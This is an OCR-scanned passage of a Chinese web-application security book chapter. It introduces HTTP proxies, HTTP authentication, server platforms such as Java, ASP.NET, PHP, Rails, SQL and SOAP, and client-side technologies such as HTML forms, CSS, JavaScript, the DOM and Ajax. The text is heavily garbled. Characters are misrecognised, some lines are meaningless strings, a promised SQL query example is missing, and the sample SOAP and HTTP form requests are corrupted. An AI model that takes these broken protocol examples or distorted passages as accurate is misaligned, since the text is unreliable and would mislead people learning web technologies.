E 注解 ”如 今 的 SSL 实 际 上 已 经 由 TLS (Transport Layer 


Security， 传 输 层 安全 ) 代替 ， 但 后 者 通常 还 是 使 用 SSL 这 个 名 称 。 


3.1.10 ” HTTP 代理 


HTTP 代 理 服务 器 是 一 个 协调 客户 端 浏览 器 与 目标 Web 服 务 器 之 间 
访问 的 服务 器 。 当 配置 浏览 器 使 用 代理 服务 器 时 ， 它 会 将 所 有 请 求 提 
交 到 代理 服务 器 ， 代 理 服务 器 再 将 请 求 转送 给 相关 Web 服 务 器 ， 并 将 
人 。 大 多 数 代理 还 使 用 其 他 服务 ， 如 缓存 、 验 证 与 访 
问 控制 。 

值得 注意 的 是 ， 如 果 使 用 代理 服务 器 ，HTTP 的 工作 机 制 会 出 现 两 
方面 的 差异 。 

口 当 浏览 器 向 代理 服务 器 发 布 HTTP 请 求 时 ， 它 会 将 完整 的 URL 

(包括 协议 前 缀 http:/ 与 服务 器 主机 名 称 ， 在 非 标 准 URL 中 ， 还 包括 端 
口号 ) 插入 请 求 中 。 代 理 服务 器 将 提取 主机 名 称 和 端口 ， 并 使 用 这 些 
信息 将 请 求 指向 正确 的 目标 Web 服 务 器 。 

口 当 使 用 HTTPS 时 ， 浏 览 器 无 法 与 代理 服务 器 进行 SSL 握 手 ， 因 
为 这 样 做 会 破坏 安全 隧道 ， 使 通信 易于 遭受 拦截 攻击 。 因 此 ， 浏 览 器 
必须 将 代理 作为 一 个 纯粹 的 TCP 级 中 继 ， 由 它 传递 浏览 器 与 目标 Web 
浏览 器 之 间 的 所 有 网 络 数据 ， 并 与 浏览 器 进行 正常 的 SSL 握 手 。 浏 览 
髓 使 用 CONNECT 方 法 向 代理 服务 器 提交 一 个 HTTP 请 求 ， 并 指定 URL 
中 的 目标 主机 名 称 与 端口 号 ， 从 而 建立 这 种 中 继 。 如 果 代 理 允 许 该 请 
求 ， 它 会 返回 一 个 含 200 状 态 码 的 HTTP 响应 ， 一 直 开 放 TCP 连 接 ， 从 
此 以 后 作为 目标 Web 服 务 器 的 纯粹 TCP 级 中 继 。 

从 某 种 程度 上 说 ， 攻 击 Web 应 用 程序 时 最 有 用 的 工具 是 一 个 处 在 
浏览 器 与 日 标 Web 站 点 之 间 的 专用 代理 服务 器 ， 使 用 它 可 以 拦截 并 修 
aie 使 用 HTTPS 的 请 求 与 啊 应 。 我 们 将 在 第 4 章 开 始 分 析 如 何 使 用 
这 种 工具 。 


3.1.11 _ HTTP 身份 验证 
HTTP 拥 有 自己 的 用 户 身份 验证 机 制 ， 使 用 不 同 的 身份 验证 方案 。 


口 Basic。 这 是 一 种 非常 简单 的 号 份 验证 机 制 ， 它 在 请 求 消 息 头 中 
随 每 条 消 轧 以 Base64 编 码 字 符 串 的 形式 发 送 用 户 证 书 。 


口 NTLM。 这 是 一 种 质询 - 啊 应 式 机 制 ， 它 使 用 某 个 Windows 
NTLM 协 议 版 本 。 

口 Digest。 这 是 一 种 质询 - 啊 应 式 机 制 ， 它 随同 用 户 证 书 一 起 使 用 
一 个 随机 值 MD5 校 验 和 。 

虽然 组 织 内 部 经 常 使 用 这 些 寻 份 验证 协议 访问 内 联网 服务 ， 但 因 
特 网 上 的 Web 应 用 程序 基本 很 少 使 用 它们 。 


号 错误 观点 “基本 身份 验证 并 不 安全 。” 

基本 身份 验证 将 未 加 密 的 证 书 插 入 HTTP 请 求 中 ， 因 此 ， 人 们 
普 衣 认为 这 种 协议 并 不 安全 ， 不 应 该 使 用 它们 。 但 实际 上 ， 许 多 银 
行使 用 的 基于 表单 的 身份 验证 也 将 未 加 密 的 证 书 插 入 HTTP 请 求 
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可 以 使 用 HTTPS 作 为 传输 机 制 ， 防 止 任何 HTTP 消息 受到 守 听 
攻击 ; 个 具有 安全 意识 的 应 用 程序 都 应 采用 这 种 机 制 。 至 少 从 
窃听 方面 来 说 ， 基 本 身份 验证 机 制 并 不 比 今天 绝 大 多 数 Web 应 用 程 
序 使 用 的 身份 验证 机 制 更 加 精 糕 。 


3.2 ”Web 功能 


除了 在 客户 端 与 服务 器 之 间 发 送 消息 时 使 用 的 核心 通信 协议 外 ， 
Web 应 用 程序 还 使 用 许多 不 同 的 技术 来 实现 其 功能 。 任 何 具 有 一 定 功 
能 的 应 用 程序 都 会 在 其 服务 器 与 客户 端 组 件 中 采用 若干 种 技术 。 在 向 
Web 应 用 程序 发 动 猛烈 攻击 前 ， 渗 透 测试 员 必须 对 应 用 程序 如 何 实现 
其 功能 所 使 用 技术 的 运作 方式 及 其 可 能 存在 的 弹 点 有 一 个 基本 的 了 
Ze 


3.2.1 RE 


早期 的 万 维 网 仅 包含 静态 内 容 。Web 站 点 由 各 种 静态 资源 组 成 ， 
如 HTML 页 面 与 图 片 ， 当 用 户 提交 请 求 时 ， 只 需 将 它们 加 载 到 Web 服 
务 器 ， 再 传送 给 用 户 即 可 。 每 次 用 户 请 求 某 个 特殊 的 资源 时 ， 服 务 履 
都 会 返回 相同 的 内 容 。 

如 今 的 web 应 用 程序 仍然 使 用 相当 数量 的 静态 资源 。 但 它们 主要 
向 用 户 提 供 动 态 生成 的 内 容 。 当 用 户 请 求 一 个 动态 资源 时 ， 服 务 器 会 
动态 建立 啊 应 ， 每 个 用 户 都 会 收 到 满足 其 特定 需求 的 内 容 。 

动态 内 容 由 在 服务 右上 执行 的 脚本 或 其 他 代码 生成 。 在 形式 上 ， 
这 些 脚 本 类 似 于 计算 机 程序 : 它们 收 到 各 种 输入 ， 并 处 理 输入 ， 然 后 
加 用 户 返回 得 出 结果 。 

当 用 户 的 浏览 右 提 出 访问 动态 资源 的 请 求 时 ， 它 并 不 仅仅 是 要 求 
访问 该 资源 的 副本 。 通 常 ， 它 还 会 随 请 求 提 交 各 种 参数 。 正 是 这 些 参 
数 保证 了 服务 器 端 应 用 程序 能 够 生成 适合 各 种 用 户 需 求 的 内 容 。HTTP 
请 求 使 用 3 种 主要 方式 回应 用 程序 传送 参数 : 

口 通过 URL 查 询 字符 串 ; 

口 通过 REST 风 格 的 URE 的 文件 路 径 ; 

口 通 过 HTTP cookie; 

口 通过 在 请 求 主 体 中 使 用 POST 方法 。 

除了 这 些 主 要 的 输入 源 以 外 ， 理 论 上 ， 服 务 器 端 应 用 程序 还 可 以 
使 用 HTTP 请 求 的 任何 一 个 部 分 作为 输入 。 例 如 ， 应 用 程序 可 能 通过 
User-Agent 消 息 头 生成 根据 所 使 用 的 浏 席 避 类 型 而 优化 的 内 容 。 

像 彰 见 的 计算 机 软件 一 样 ，Web 应 用 程序 也 在 服务 器 端 使 用 大 量 
技术 实现 其 功能 。 这 些 技术 包括 : 


口 脚本 语言 ， 如 PHP、VBScript 和 Perl; 
口 Web 应 用 程序 平台 ， 如 ASP.NET 和 Java; 
口 Web 服 务 器 ， 如 Apache、IS 和 Netscape Enterprise 
口 数据 库 ， 如 MS-SQL、Oracle 和 MySQL; 
„Ț„ 9 其 他 后 端 组 件 ， 如 文件 系统 、 基 于 SOAP 的 Web 服 务 和 目录 服 
务 。 


本 书 将 详细 介绍 这 些 技 术 及 其 相关 漏洞 。 下 面 将 介绍 一 些 可 能 过 
到 的 最 常见 的 Web 应 用 程序 平台 和 语言 。 


Q BA 我 们 的 应 用 程序 只 需要 粗略 的 安全 检查 


因为 它们 采用 了 非常 实用 的 框架 。” 

在 开发 Web 应 用 程序 时 ， 使 用 实用 框架 往往 是 人 们 放松 警惕 的 
主要 原因 ， 因 为 人 们 认为 这 样 做 殊 可 以 目 动 避免 SQL 注 入 等 兽 见 的 
漏洞 。 但 由 于 以 下 两 方面 的 原因 ， 这 种 看 法 并 不 正确 。 


首先 ， 大 量 Web 应 用 程序 漏洞 在 应 用 程序 的 设计 ， 而 不 是 实施 
阶段 发 生 ， 而 且 ， 这 些 漏洞 与 所 采用 的 开发 框架 或 语言 无 大 。 

其 次 ， 上 述 实用 框架 通 肖 采用 最 新 的 插件 或 程序 包 ， 而 这 些 程 
序 包 很 可 能 并 未 经 过 安全 检查 。 有 趣 的 是 ， 如 果 之 后 在 应 用 程序 中 
发 现 漏 洞 ， 文 持 使 用 框架 的 开发 者 锯 上 会 改变 立场 ， 转 而 批评 他 们 
使 用 的 框 染 或 第 三 方程 序 包 。 


1. Java 平 台 

近 几 年 来 ，Java 平 台 企业 版 ( 原 J2EE) 事实 上 已 经 成 为 大 型 企业 
所 使 用 的 标准 应 用 程序 。 该 平台 由 Sun 公 司 开 发 (现在 则 属于 Oradle 公 
司 ) 。 它 应 用 多 层 与 负载 平衡 架构 ， 非 常 适 于 模块 化 开发 与 代码 重复 
利用 。 由 于 其 历史 悠久 、 应 用 广泛 ， 因 此 ， 开 发 者 在 开发 过 程 中 可 以 
利用 许多 高 质量 的 开发 工具 、 应 用 程序 服务 器 与 框架 。Java 平 台 可 在 
儿 种 基础 型 操作 系统 上 运行 ， 包括 Windows、 Linux 与 Solaris ° 

描述 基于 Java 的 Web 应 用 程序 时 ， 往 往 会 使 用 许多 易于 混 消 的 术 
语 ， 读 者 应 该 对 它们 有 所 警觉 。 

J Enterprise Java Bean (EJB) 是 一 个 相对 重量 级 的 软件 组 件 ， 
它 将 一 个 特殊 业务 功能 的 逻辑 组 合 到 应 用 程序 中 。EJB 旨 在 处 理应 用 
程序 开发 者 必须 解决 的 各 种 技术 挑战 ， 如 交易 完整 性 。 


口 简 单传 统 Java 对 象 (Plain Old Java Object，POJO) 是 一 个 普通 
的 Java 对 象 ， 以 区 别 如 EJB 之 类 的 特殊 对 象 。POJO 和 常用 于 表示 那些 用 
7 ` 比 EJB 更 加 简单 且 更 加 轻 量 级 的 对 象 以 及 用 在 其 他 框架 中 
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Java Servle 提 应 用 程序 服务 器 中 的 一 个 对 象 ， 它 接收 客户 端的 
HTTP 请 求 并 返回 HTTP 响 应 。Servlet 可 使 用 大 量 接口 来 促进 应 用 程序 
开发 。 

g Java Web 容 器 是 一 个 为 基于 Java 的 Web 应 用 程序 提供 运行 时 环 
境 的 平台 或 引擎 。Apache Tomcat ` BEA WebLogic 和 JBoss 都 属于 Java 
Web 容 器 。 

许多 Java Web 应 用 程序 在 定制 代码 中 使 用 第 三 方 与 开源 组 件 。 这 
种 做 法 非常 具有 吸引 力 ， 因 为 它 能 够 减轻 开发 工作 ， 而 且 Java 非 常 适 
于 使 用 这 种 模块 式 的 方法 。 关 键 应 用 程序 功能 常用 的 组 件 包括 : 

口 身 份 验证 JAAS、ACEGI:; 

口 表示 层 SiteMesh ` Tapestry; 

口 数 据 库 对 象 关 系 映 和 Hibernate; 

口 日 志 一 一 Log4J 。 

如 果 能 够 确定 受 攻击 的 应 用 程序 所 使 用 的 开源 软件 包 ， 渗 透 测 试 
员 就 可 以 下 载 这 些 软 件 包 进 行 代 码 审查 ， 或 者 安装 它们 开始 攻击 实 
验 。 这 些 组 件 中 的 任何 一 个 漏洞 都 可 能 被 攻击 者 利用 。 

2. ASP.NET 

ASP.NET 是 Microsoft 开 发 的 一 种 Web 应 用 程序 框架 ， 也 是 Java 平 台 
的 主要 竞争 对 手 。ASP.NET 比 Java 平 台 晚 几 年 推出 ， 但 它 已 经 占领 了 
Java 平 台 的 部 分 市 场 。 

ASP.NET 使 用 Microsoft 的 .NET Framework， 提 供 一 个 虚拟 机 

[CLR (Common Language Runtime， 通 用 语言 运行 时 ) | 与 一 组 强 
大 的 API。 因 此 ，ASP.NET 应 用 程序 可 使 用 任何 .NET 语 言 (如 C# 或 
VB.NET) 来 编写 。 

ASP.NET 采 用 传统 桌面 软件 常用 的 事件 驱动 编程 范 型 ， 而 非 许多 
早期 Web 应 用 程序 框架 所 使 用 的 基于 脚本 的 方法 。 基 于 这 种 特点 ， 再 
结合 Visual Studio 提 供 的 强大 开发 工具 ， 任 何人 即使 并 不 具备 熟练 的 编 
程 技能 ， 也 能 迅速 开发 出 功能 强大 的 Web 应 用 程序 。 

不 需要 开发 者 做 任何 工作 ，ASPNET 框 架 就 能 防御 一 些 常见 的 
Web 应 用 程序 漏洞 ， 如 路 站 点 脚本 。 但 这 种 明显 简化 的 特点 也 造成 一 
个 现实 问题 ， 即 许多 小 型 的 ASPNET 应 用 程序 实际 上 由 初学 者 开发 ， 
他 们 对 于 Web 应 用 程序 面临 的 核心 安全 问题 缺乏 了 解 。 


3. PHP 
PHP 语 言 源 于 一 个 业余 项 目 [最 初 该 缩写 词 代表 个 人 主页 
(Personal Home Page) | 。 之 后 ， 该 项 目 迅速 发 展 成 为 一 个 功能 强 

大 、 应 用 丰富 的 Web 应 用 程序 开发 框 氏 。PHP 常 常 与 其 他 免费 技术 整 
合 ， 如 所 谓 的 LAMP 组 合 (包括 操作 系统 Linux、Web 服 务 器 Apache 、 
数据 库 服务 器 MySQL 和 Web 应 用 程序 编程 语言 PHP) 。 

人 们 使 用 PHP 开 发 出 大 量 的 开源 应 用 程序 与 组 件 ， 它 们 为 常用 的 
应 用 程序 功能 提供 了 现成 的 解决 方案 ， 并 将 其 整合 到 应 用 更 加 广泛 的 
定制 应 用 程序 中 ， 例 如 : 
口 公告 牌 一 PHPBB ` PHP-Nuke; 
口 管理 前 端 一 PHPMyAdmin:; 
口 Web 邮 件 SquirrelMail ` IlohaMail; 
口 相 册 Gallery; 
口 购 物 车 osCommerce ` ECW-Shop; 
a MediaWiki > WakkaWikki ° 
由 于 PHP 完 全 免费 ， 人 简单 易 用 ， 因 此 许多 编写 web 应 用 程序 的 初 
学 者 往往 使 用 它 作 为 首选 语言 。 但 是 ， 由 于 历史 原因 ，PHP 框 架 的 设 
计 方 法 与 默认 配置 导致 程序 员 很 容易 不 经 意 间 在 代码 中 引入 安全 漏 
洞 ， 因 此 使 用 PHP 编 写 的 应 用 程序 中 可 能 包含 大 量 安全 漏洞 。 除 此 之 
Sb, PHP BAS HATES Tika, EFE bist i eR tA TE 
加 以 利用 。 请 参阅 第 19 章 了 解 有 关 PHP 应 用 程序 常见 漏洞 的 详情 。 

4. Ruby On Rails 

Rails 1.0 于 2005 年 发 布 ， 主 要 侧重 于 模型 -视图 -控制 器 体系 架构 。 
Rails 的 主要 优势 在 于 ， 使 用 它 能 够 以 极 快 的 速度 创建 成 熟 的 数据 驱动 
应 用 程序 。 如 果 开 发 者 遵循 Rails 编 码 风 格 和 命名 约定 ， 则 可 以 使 用 
Rails 目 动 生成 数据 库 内 容 的 模型 、 修 改 该 模型 的 控制 如 操作 以 及 供应 
用 程序 用 户 使 用 的 默认 视图 。 与 其 他 功能 强大 的 新 技术 一 样 ， 人 们 已 
在 Ruby On Rails 中 发 现 了 一 些 漏 洞 ， 包 括 能 够 避 开 * 安 全 模式 ”， 这 与 
在 PHP 中 发 现 的 漏洞 类 似 。 

有 关 最 近 发 现 的 漏洞 的 详细 信息 ， 请 参阅 www.ruby- 
lang.org/en/security/ ° 

5. SQL 

结构 化 查询 语言 (SQL) 用 于 访问 Oracle、MS-SQL 服 务 器 和 
MySQL 等 天 系数 据 库 中 的 数据 。 目 前 ， 绝 大 多 数 的 Web 应 用 程序 都 将 
基于 SQL 的 数据 库 作 为 它们 的 后 端 数据 仓 库 ， 而 且 ， 几 乎 所 有 应 用 程 
序 的 功能 都 需要 以 某 种 方式 与 这 些 数据 仓库 进行 交互 。 


关系 数据库 将 数据 存储 在 表 中 ， 每 个 表 又 由 许多 行 和 列 构成 。 每 
一 列 代表 一 个 数据 字段 ， 如 “名 称 ” 或 “电子 邮件 地 址 *”， 每 一 行 则 代表 
为 这 些 字段 中 的 一 些 或 全 部 字段 分 配 值 的 项 。 

SQL 使 用 查询 来 执行 常用 的 任务 ， 如 读 取 、 添 加 、 更 新 和 删除 数 
据 。 例 如 ， 要 检索 用 户 的 具有 指定 名 称 的 电子 邮件 地 址 ， 应 用 程序 可 
以 执行 以 下 查询 : 

要 实现 它们 所 需 的 功能 ，Web 应 用 程序 可 能 会 将 用 户 提 交 的 输入 
组 合 到 由 后 端 数据 库 执行 的 SQL 查 询 中 。 如 果 以 危险 的 方式 进行 组 
合 ， 攻 击 者 束 可 以 提交 悉 意 输入 来 干扰 数据 库 的 行为 ， 从 而 读 取 和 写 
ee eee 
其 用 法 。 

6. XML 

可 扩展 标记 语言 (XML) 是 一 种 机 器 可 读 格 式 的 数据 编码 规范 。 
与 其 他 标记 语言 一 样 ，XML 格 式 将 文档 划分 为 内 容 (数据 ) 和 标记 
(给 数据 作 注 解 ) 。 

标记 主要 用 标签 表示 ， 它 们 包括 起 始 标签 、 结 束 标签 和 空 元 素 标 


</ Lagnane> 


起 始 和 结束 标签 成 对 出 现 ， 其 中 可 以 包括 文档 内 容 或 子 元 素 : 


<pet>ginger</pet> 


<pets><dog>spot</dog><cat>paws</cat></pets> 


标签 可 以 包含 以 名 / 值 对 出 现 的 属性 : 


4 version 1 cpets>...</pets></data> 


XML 之 所 以 可 扩展 ， 是 因为 它 可 以 使 用 任意 数量 的 标签 和 属性 
名 。XML 文 档 通 常 包含 文档 类 型 定义 (DTD) ，DTD 定 义 文档 中 使 用 
的 标签 、 属 性 及 其 组 合 方式 。 

服务 硕 端 和 客户 端 Web 应 用 程序 广泛 采用 XML 及 由 XML 派生 的 技 
术 ， 我 们 将 在 本 章 后 面部 分 介绍 这 些 内 容 。 

7. Web 服 务 


虽然 本 书 主要 介绍 Web 应 用 程序 攻击 ， 但 本 书 介绍 的 许多 漏洞 同 
样 适用 于 Web 服 务 。 实 际 上 ， 许 多 应 用 程序 本 质 上 就 是 一 组 后 端 Web 
服务 的 GUI 前 端 。 

Web 服 务 使 用 简单 对 象 访问 协议 (SOAP) 来 交换 数据 。 通 常 ， 
SOAP 使 用 HTTP 协 议 来 传送 消息 ， 并 使 用 XML 格 式 表 示 数 据 。 

典型 的 SOAP 请 求 如 下 所 示 : 


POST /doTrans asp HTTP/1.0 
Eost: mdsec-mer.int.mds net 
te Type: app = n/soaptx harse 8 
ntent-Length: 89 
XIT version 
dap: Envelor <min p="http 3 2 ay log 
soap: Body 
<pre:Ada xmlins:pre=http arg ts soap:encodingsStyle= 
BD: //www.w3. 00 p-e r 
cAcCcount> 
<Fromac nt>162B1L00E FromA n 
Amount>14 ¢/AmOunt> 
ClearecFunds>Fal Clea Fund 
<ToAccoun 84476 TOA 
ccoun 
pre:Acc> 
soap : Boday> 


ve pe> 


在 使 用 浏览 器 访问 Web 应 用 程序 时 很 可 能 会 遇 到 SOAP， 服 务 器 端 
应 用 程序 使 用 它 与 各 种 后 端 系统 进行 通信 。 如 采 将 用 户 提交 的 数据 直 
接 组 合 到 后 端 SOAP 消 息 中 ， 吏 可 能 产生 与 SQL 注入 类 似 的 漏洞 。 我 们 
将 在 第 10 草 详细 介绍 这 些 问 题 。 

如 果 Web 应 用 程序 还 直接 公开 Web 服 务 ， 那 么 ， 我 们 还 需要 检查 
这 些 Web 服 务 。 即 使 前 病 应 用 程序 是 基于 Web 服 务 编写 的 ， 但 它们 在 
输入 处 理 以 及 服务 本 和 喘 所 披露 的 功能 方面 仍 存 在 区 别 。 正 常情 况 下 ， 
服务 器 会 以 Web 服 务 描述 语言 (WSDL) 格式 公布 可 用 的 服务 和 参 
数 。 攻 击 痢 可 以 使 用 soapUI 之 类 的 工具 、 基 于 已 公布 的 WSDL 文 件 创 
建 示例 请 求 ， 以 调用 刁 份 验证 Web 服 务 ， 获 得 身份 验证 令 牌 ， 并 随后 
提出 任何 Web 服 务 请 求 。 


3.2.2 端 功 能 


服务 硕 端 应 用 程序 要 接收 用 户 输入 与 操作 ， 并 同 用 户 返 回 其 结 
条 ， 扎 必须 提供 一 个 客户 端 用 户 界 面 。 由 于 所 有 Web 应 用 程序 都 通过 


Web 浏 览 恬 进行 访问 ， 因 此 这 些 界 面 共享 一 个 技术 核心 。 然 而 ， 建 立 
这 些 界面 的 方法 各 不 相同 。 而 且 ， 近 些 年 来 ， 应 用 程序 利用 客户 端 技 
术 的 方式 也 一 直 在 发 生 和 急剧 变化 。 

1. HTML 

HTML 是 建立 Web 界 面 所 需 的 核心 技术 。 这 是 一 种 用 于 描述 浏览 
侣 所 显示 的 文档 结构 的 基于 标签 的 语言 。 最 初 ，HTML 只 能 对 文本 文 
档 进行 简单 的 格式 化 处 理 。 如 今 ， 它 已 经 发 展 成 为 一 种 应 用 丰富 、 功 
能 强大 的 语言 ， 可 用 于 创建 非常 复杂 、 功 能 强大 的 用 户 界 面 。 

XHTML 是 HTML 的 进化 版 本 ， 它 基于 XML ， 并 采用 比 旧 版 HTML 
更 严格 的 规范 。 之 所 以 推出 XHTML ， 部 分 是 因为 需要 转 而 采用 一 种 
更 加 严格 的 HTML 标记 标准 ， 以 避免 由 于 浏览 右 必 须 接 受 不 太 严 格 的 
HTML 格 式 而 导致 的 各 种 攻击 和 安全 问题 。 

有 关 HTML 及 相关 技术 的 详情 ， 请 参阅 下 面 的 几 节 。 

2. 超 链 接 

客户 端 与 服务 絮 之 间 的 大 量 通 信和 都 由 用 户 单 击 超 链接 驱动 。Web 
应 用 程序 中 的 超 链接 通常 包含 预先 设 定 的 请 求 参 数 ， 这 些 数据 项 不 需 
由 用 户 输 入 ， 而 是 由 服务 絮 将 其 插入 用 户 单 击 的 超 链 接 的 目标 URL 
中 ， 以 这 种 方式 提交 。 例 如 ，Web 应 用 程序 中 可 能 会 显示 一 系列 新 闻 
报道 链接 ， 其 形式 如 下 : 


<a hret="?redir=/updates/update29.html">What's happening?</a> 
当 用 户 单 击 这 个 链接 时 ， 浏 览 絮 会 提出 以 下 请 求 : 


GET /news/8/?redir=/updates/update29 .html HTTP/1.1 


Host: mdsec.net 


服务 器 收 到 查询 字符 串 中 的 参数 (newsid) ， 并 使 用 它 的 值 决定 向 用 
户 返回 什么 内 容 。 

3. 表单 

虽然 基于 超 链 接 的 导航 方法 负责 客户 端 与 服务 器 之 间 的 绝 大 多 数 
通信 ， 但 许多 Web 应 用 程序 还 是 需要 采用 更 灵活 的 形式 收集 输入 ， 并 
接收 用 户 输 入 。HTML 表 单 是 一 种 常见 的 机 制 ， 人 允许 用 户 通 过 浏览 器 
提交 任意 输入 。 以 下 是 一 个 典型 的 HTTP 表 单 : 


<form action="/secure/login.php?app=quotations” method="post*> 
username: <input type="text" name="username”"><br> 

password: <input type="password" name="password"> 

<input type="hidden" name="redir" value="/secure/home.php"> 
<input type="submit" name="submit" value="log in"> 


</form> 


= FAP Ee EP fy HE pe PE, Di be AR Ge DLP 


POST /secure/login.php?app=quotations HTTP/1.1 
Host: wahh-app.com 

Content-Type: application/x-www- form-urlencoded 
Content-Length: 39 

Cookie: SESS=GTnrpx2ss2ctSvSnhxXJGyGOLJ47MXRsjcFM53a 


username=Gaf &passworG=fooéredir=/secure/home.phpésubmit=log+in 


EX Pig F, AJLA RWA T rep GUAT (A Pe AR Ps i ARS as 
Brg PERT RE ° 

口 AVAHTML#2 ince FEE MaePOSTAIEWIBTE, W a 
LTE FAIR SF RPE FE, FRE PAE Ae RIE ER o 

口 除 用 户 输入 的 两 个 数据 外 ， 表 单 中 还 包含 一 个 隐藏 参数 

(redir) 与 一 个 提交 参数 (submit) 。 这 两 个 参数 都 在 请 求 中 提交 ， 
服务 器 端 应 用 程序 可 使 用 它们 控制 其 逻辑 。 

口 与 前 面 显示 的 超 链 接 示例 一 样 ， 负 责 表 单 提交 的 目标 URL 也 包 
-个 预先 设 定 的 参数 (app) 。 该 参数 可 用 于 控制 服务 器 端的 处 理 过 
时 o 

口 请 求 中 包含 一 个 cookie 参 数 (SESS) ， 服 务 器 在 早先 的 响应 中 
将 其 发 布 给 浏 贤 器 。 该 参数 可 用 于 控制 服务 器 端 处 理 过 程 。 

前 面 的 请 求 中 包含 一 个 消息 头 ， 它 规定 消息 主体 中 的 内 容 类 型 为 
x-www-form-urlencoded ° 1X #278 F#IURL# IA $F FFB PAE, YALE 
体 中 的 参数 也 以 名 / 值 对 表示 。multipart/form-data 是 提交 表单 数据 时 可 
能 过 到 的 男 一 种 类 型 的 内 容 。 应 用 程序 可 在 表单 标签 的 enctype 属 性 中 
要 求 浏 唤 器 使 用 多 部 分 编码 。 使 用 这 种 编码 形式 ， 请 求 中 的 Content- 
Type 消息 头 还 会 指定 一 个 随机 字符 串 ， 用 它 来 分 隅 请 求 主 体 中 的 参 
数 。 例 如 ， 如 果 表 单 指定 多 部 分 编码 ， 其 生成 的 请 求 如 下 所 示 : 


POST /secure/login.php?anp-quotations HTTP/1.1 
Host: wahn-appo.com 
Content-Type: multipart /form-data; boundary=------------ 7971385G0ala 


Content-Length: 369 


Cookie: SESS=GTNnrox2ss2tSWSnhXJGyGOLJ47MXRs jcrFM6BG 


--7d71385d0ala 


Content-Disposition: form-data; name="username" 
daf 

7a71385da0ala 
Content-Disposition: form-data; name="password" 


Content-Disposition: form-data; name="redir* 


fsecure/home.php 
7d71385d0ala 


Content-Disposition: form-data; name="submit” 


leg in 
------7071385d0ala-- 


4. CSS 

BBR (CSS) 是 一 种 描述 以 标记 语言 编写 的 文档 的 表示 形 
式 的 语言 。 在 Web 应 用 程序 中 ，CSS 用 于 指定 HTML 内 容 在 屏幕 上 (以 
及 打印 页 面 等 其 他 媒介 中 ) 的 呈现 方式 。 

现代 的 Web 标 准 力 求 将 文档 的 内 容 与 其 表示 形式 尽 可 能 地 区 分 开 
来 。 这 种 区 分 具有 许多 好 处 ， 包 括 简化 和 缩小 HTML 页 面 ， 更 易于 更 
新 网 页 的 格式 以 及 提高 可 访问 性 等 。 

CSS 以 各 种 格式 化 规则 为 基础 ， 这 些 规则 可 以 通过 不 同 的 详细 程 
度 进 行 定 义 。 如 采 多 个 规则 与 一 个 文档 元 素 相 匹配 ， 在 这 些 规则 中 完 
Se ene 从 而 将 适当 的 样式 属性 组 合 应 用 于 该 元 

CSS 语 法 使 用 选择 器 来 定义 一 类 标记 元 素 (应 将 一 组 指定 的 属性 
应 用 于 这 些 元 素 ) 。 例 如 ， 下 面 的 CSS 规 则 定义 使 用 <h2> 标 签 标 记 的 
标题 的 前 景 颜色 : 

h2 { color: red; } 

在 Web 应 用 程序 安全 的 早期 阶段 ，CSS 在 很 大 程度 上 被 人 们 所 忽 
略 ， 人 们 认为 它们 不 可 能 造成 安全 威胁 。 今 天 ，CSS 本 身 正 不 断 成 为 


安全 漏洞 的 来 源 ， 并 且 被 攻击 者 作为 传送 针对 其 他 类 型 的 漏洞 的 入 侵 
程序 的 有 效 手段 《有 关 详 细 信 息 ， 请 参阅 第 12 草 和 第 13 章 ) 。 

5. JavaScript 

超 链接 与 表单 可 用 于 建立 能 够 轻易 接收 大 多 数 Web 应 用 程序 所 需 
输入 的 丰富 用 户 界面 。 然 而 ， 许 多 应 用 程序 使 用 一 种 更 加 分 布 式 的 模 
型 ， 不 仅 使 用 客户 端 提 交 用 户 数据 与 操作 ， 还 通过 它 执 行 实 际 的 数据 
处 理 。 这 样 做 主要 出 于 两 个 原因 。 

口 改 善 应 用 程序 的 性 能 ， 因 为 这 样 可 在 客户 端 组 件 上 彻底 执行 某 
些 任务 ,不 需要 在 服务 器 间 来 回 发 送 和 接收 请 求 与 啊 应 。 

口 提高 可 用 性 ， 因 为 这 样 可 根据 用 户 操 作 动 态 更 新 用 户 界 面 ， 而 
不 需要 加 载 服 务 絮 传送 的 全 新 HTML 页 面 。 

JavaScript 是 一 种 相对 简单 但 功能 强大 的 编程 语言 ， 使 用 它 可 方便 
地 以 各 种 仅 使 用 HTML 无 法 实现 的 方式 对 Web 界 面 进行 扩展 。 
JavaScript 和 常用 于 执行 以 下 任务 。 

口 确 认 用 户 输 入 的 数据 ， 然 后 将 其 提交 给 服务 器 避 侈 因数 据 包含 
彰 误 而 提交 不 必要 的 请 求 。 
口 根 据 用 户 操 作 动 态 修 改 用 户 界面 ， 例 如 ， 执 行 下 拉 菜 单 和 其 他 
类 似 于 非 Web 界 面 的 控制 。 
口 查询 并 更 新 浏览 器 内 的 文档 对 象 模型 (Document Object 
Model, DOM) ， 控 制 浏览 器 行为 〈 稍 后 就 会 介绍 浏览 器 DOM) 。 

6. VBScript 

VBScript 可 用 于 替代 只 有 Internet Explorer) bias 7 SC FEA 
JavaScript。VBScript 以 Visual Basic eth, FF A LA Sl) bt aS DOME tT 
交互 。 但 通常 而 言 ，VBScript 不 如 JavaScript 强 大 和 成 熟 。 

由 于 VBScript 只 能 在 特定 浏 贤 絮 中 使 用 ,今天 的 Web 应 用 程序 已 
经 很 少 使 用 VBScript。 从 安全 角度 看 ， 我 们 之 所 以 对 它 感 兴趣 ， 是 因 
为 在 使 用 JavaScript 无 法 传送 入 侵 程 序 时 ， 攻 击 者 可 以 通过 它 来 传送 针 
对 跨 站 点 脚本 之 类 漏洞 的 入 侵 程 序 〈 请 参阅 第 12 章 ) 。 

7. 文档 对 象 模型 

文档 对 象 模型 (DOM) 是 可 以 通过 其 API 查 询 和 操纵 的 HIML 文 
档 的 抽象 表示 形式 。 

DOM 人 允许 客户 端 脚本 按 id 访 问 各 个 HTML 元 到 并 以 编程 方式 访问 
这 些 元 素 的 结构 。DOM 还 可 用 于 读 取 和 更 新 当前 URL 和 cookie 等 数 
据 。 男 外 ，DOM 还 包括 一 个 事件 模型 ， 以 便于 代码 钧 住 各 种 事件 ， 如 
表单 提交 、 通 过 链接 导航 及 键 击 。 


如 下 一 节 所 述 ， 浏 览 右 DOM 操 纵 是 基于 Ajax 的 应 用 程序 采用 的 天 
键 技 术 。 

8. Ajax 

Ajax 是 一 组 编程 技术 ， 用 于 在 客户 端 创建 旨 在 模拟 传统 桌面 应 用 
程序 的 流畅 交互 和 动态 行为 的 用 户 界 面 。 

Ajax 是 “异步 JavaScript 和 XML" 的 缩写 ， 尺 管 今天 的 Web Ajax 请 求 
既 不 需要 是 异步 请 求 ， 也 不 使 用 XML ° 

